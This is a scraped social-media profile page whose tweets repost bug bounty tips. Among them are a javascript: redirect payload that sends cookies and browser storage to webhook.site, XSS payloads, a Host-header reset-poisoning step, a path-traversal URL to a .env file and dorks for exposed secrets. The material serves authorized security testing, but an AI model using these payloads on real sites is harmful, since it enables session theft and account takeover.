@WllGates profile picture
Will Gates @WllGates

Curiosity is The Engine of Achievement

Joined April 2022
  • Tweets 394
  • Following 242
  • Followers 4,705
256 Photos and videos
Pinned Tweet
Will Gates@WllGates
2 May 2024
“If you want to find the secrets of the universe, think in terms of energy, frequency and vibration.” ~ Nikola Tesla
4
28
6,974
/login?redirectUrl=javascript:fetch('webhook.site 0{method:'POST', body:JSON.stringify({cookies:document.cookie,sessionStorage:sessionStorage,localStorage:localStorage})}) credit: @JoaoGomes12243 #bugbountytips #BugBounty
2
20
200
6,700
I earned $$$$$ for my submission on bugcrowd.com/h/ahmadalzuriqi Found a flaw in /api/users/$id/rest-password/ (admin panel): OTP exposed inside JWT → reset password → new password. → Admin account takeover credit: @ZuriqiAhmad #BugBounty #bugbountytips
2
21
323
16,035
From a small mistake to make the full control over an internal ticketing system worth $$$$. Checkout my latest writeup: medium.com/@NeM0x00/from-a-s… credit: @Yousef39960629 #bugbountytips #bugbounty #bughunting

From a Simple Client-Side Mistake to Full Read/Write Access of an Internal Support System.

Hi folks, We will discuss today a small mix-up that gave me a road to the internal system flow for the organization.

medium.com
2
10
81
5,512
Sensitive Information Disclosure(path Traversal)🔥 URL: http://IP_removed/index.php/../../.env IMPACT: Database credentials, Laravel app_key. credit: @datafuel0 #BugBounty #bugbountytip
4
14
137
5,569
My new writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite credit: @h4x0r_dz #bugbountytips #BugBounty #infosec medium.com/@h4x0r_dz/23000-f…

23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite

How I found Authentication Bypass >> File upload vulnerability >> Arbitrary File Overwrite and how I managed I found the path of the file…

medium.com
5
59
427
27,461
⚡ 'Datr' cookie theft and AI leads to Facebook account takeover via trusted device recovery ($24,000 bounty) Blog: ysamm.com/uncategorized/2025… Author: @samm0uda credit: @mqst_ #bugbountytips #BugBounty #infosec
1
10
68
2,997
Tip: Add to your wordlist /backup.tar credit: @111xNagashy #bugbountytips #BugBounty
1
5
108
3,808
$500 bounty for DNS email takeover via improper domain verification. A non-authorized DNS mail under the main domain was accepted as a company email, allowing account creation and data access. credit: @jatav_ravi #bugbountytips #BugBounty
1
3
93
4,484
Account Takeover via Password Reset Poisoning Tips :- 1- During signup or password reset flow replace the Host header value with:- Host: attacker.com 2- Observe that the email verification or password reset link got poisoned credit: @wadgamaraldeen #bugbountytips
1
7
155
5,475
Subdomain Takeover via Unclaimed CNAME 1️⃣ dev(.)example(.)om → CNAME to unclaimed(.)project(.)hosting(.)com 2️⃣ project(.)hosting(.)com is not in use 3️⃣ Attacker creates a project at that provider with same name 4️⃣ Takes over dev(.)example(.)com credit:@NullSecurityX #bounty
2
3
90
3,606
high severity vulnerability 🔥 Low-priv got 401 on versioned endpoint. Removing v2 bypassed auth and exposed sensitive identity images. Normal: /omni/get/images/v2 (401) Bypass: /omni/get/images (succeeds) credit: @mrdesoky0 #bugbountytips #BugBounty
1
2
80
2,437
Reflected XSS on Hyundai subdomain. 🎯 Payload: "><svg/onload=confirm(1)> #xss #bugbountytips #BugBounty
4
22
255
10,645
🔥 Low => Critical ? Tip:- When find phpinfo search about [db_password ,db_username] credit: @111xNagashy #bugbountytips #BugBounty
2
8
135
6,105
Google Dorks are still undefeated in 2026. 🔍 Found a "sussy" config leak today full SMTP access was just sitting there in plain text. Impact verified, report sent, and awareness raised. credit: @0x0smilex #bugbountytips #ethicalhacking
3
12
107
4,760
Found an exposed .env file using a simple dork: site:example.com filetype:env #bugbountytips #BugBounty
1
1
23
863
Found a fantastic free web app for new Bug Bounty Hunters who can’t invest much into tools yet. trinetlayer.com You can instantly jump into scanning and spend more time exploring, digging deeper, and sharpening your techniques. credit: @Raman_Mohurle #bugbountytips
4
72
362
19,556
Here is how chaining a self‑XSS with an HTML email injection resulted in account takeover blog.ayoubnouri.me/blog/when…… credit: @ay0ub_n0uri #bugbountytips #xss
3
12
147
5,130
PDF file for XSS, it can bypass any waf for who looking for Stored XSS , and it can be changed to blind if you want to Simply I encoded the payload as ASCII hex You can edit the payload over notepad github.com/orwagodfather/… credits: @GodfatherOrwa #bugbountytips
23
222
7,010
A very good xss payload.🔥 <sCriPt x>(((confirm)))``</scRipt x> credit: @viehgroup #bugbountytips #xss #bugbounty
3
34
284
13,434
Will Gates@WllGates
11 Oct 2025
🔥I found a High severity #IDOR vulnerability on @Bugcrowd platform that led to ATO! Once again, developers messed up by returning the session access token of the victim, allowing me to gain full access to the user's account. credit: @PlatasSec #bugbounty #tips
6
3
166
5,842
Load more